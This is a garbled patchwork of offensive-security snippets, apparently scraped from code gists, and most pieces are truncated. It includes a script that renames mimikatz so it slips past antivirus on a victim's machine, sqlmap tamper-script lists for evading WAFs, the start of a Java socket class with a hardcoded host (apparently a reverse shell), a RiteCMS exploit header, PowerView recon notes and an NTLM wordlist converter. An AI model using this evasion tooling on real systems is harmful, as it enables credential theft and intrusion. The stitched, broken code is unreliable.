This tutorial is for Ubuntu & Squid3. Use AWS, Google Cloud, DigitalOcean, or any other service that offers Ubuntu to follow it.
# Refresh the package index, then install the Squid proxy and apache2-utils
# (presumably for htpasswd to create the proxy's password file — the
# tutorial text does not say).
# NOTE(review): on recent Ubuntu releases the package is named `squid`;
# `squid3` may only exist as a transitional name — verify for your release.
sudo apt-get -y update
sudo apt-get -y install squid3
sudo apt-get -y install apache2-utils
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
#   Get  : retrieve full raw data sets
#   Find : 'find' specific data entries in a data set
// Not sure where I originally got this from.
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.OutputStream; | |
import java.net.Socket; | |
public class C { | |
public C() throws Exception { | |
String host="10.0.0.90"; |
# Exploit Title: RiteCMS - Arbitrary File Overwrite (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary, such as "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com", ...,
# so removing them from the project before compiling gets past most AV solutions.
# We could go further and change some functionality keywords such as "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth", ...,
# but that needs the documentation adapted as well, so it has not been done; try it if your victim's AV still detects mimikatz after this program.
# Clone the upstream repository into ./windows, rename its subdirectory, and
# rewrite the project name in-place across every file under it.
# NOTE(review): each line below ends in a stray "| |" left over from page
# extraction; as written these lines are not valid shell.
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/candycrush | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
import hashlib | |
import argparse | |
# Command-line interface: one required option, -w/--wordlist, naming the
# file whose entries are to be converted.
# NOTE(review): each line below ends in a stray "| |" left over from page
# extraction; as written these lines are not valid Python.
parser = argparse.ArgumentParser(description='Password to NTLM') | |
parser.add_argument("-w","--wordlist",required=True, help = "wordlist file to be converted to NTLM") | |
args = parser.parse_args() | |
wordfile = args.wordlist | |
# Running count of converted entries; presumably incremented by the loop
# that follows this excerpt — nothing here updates it.
total_converted = 0 | |
# NOTE(review): opened without a `with` block and without an explicit
# encoding; whatever reads and closes `f` lies outside this excerpt.
f = open(wordfile, "r") |
https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
The table below shows the results of tests launched against an F5 BIG-IP ASM WAF appliance in its XX version of YY and ZZ version of XY.
The names below are the values to pass to sqlmap's --tamper= parameter.
The Violation Rating column gives the most common rating among the topmost 20 requests observed by F5 in its Security >> Event Logs: Application: Requests view.
The scale is 0-5.
# strings for finding backdoor shells, rootkits, botnets, and exploitable functions
# grep -Rn "shell *(" /var/www
exec | |
passthru | |
shell_exec | |
system | |
phpinfo | |
base64_decode | |
chmod | |
mkdir |
#Faisalfs10x
#!/usr/bin/env python
import time, subprocess | |
from selenium import webdriver | |
from selenium.webdriver.common.keys import Keys | |
from selenium.webdriver.firefox.options import Options | |
from datetime import datetime | |
def main(): | |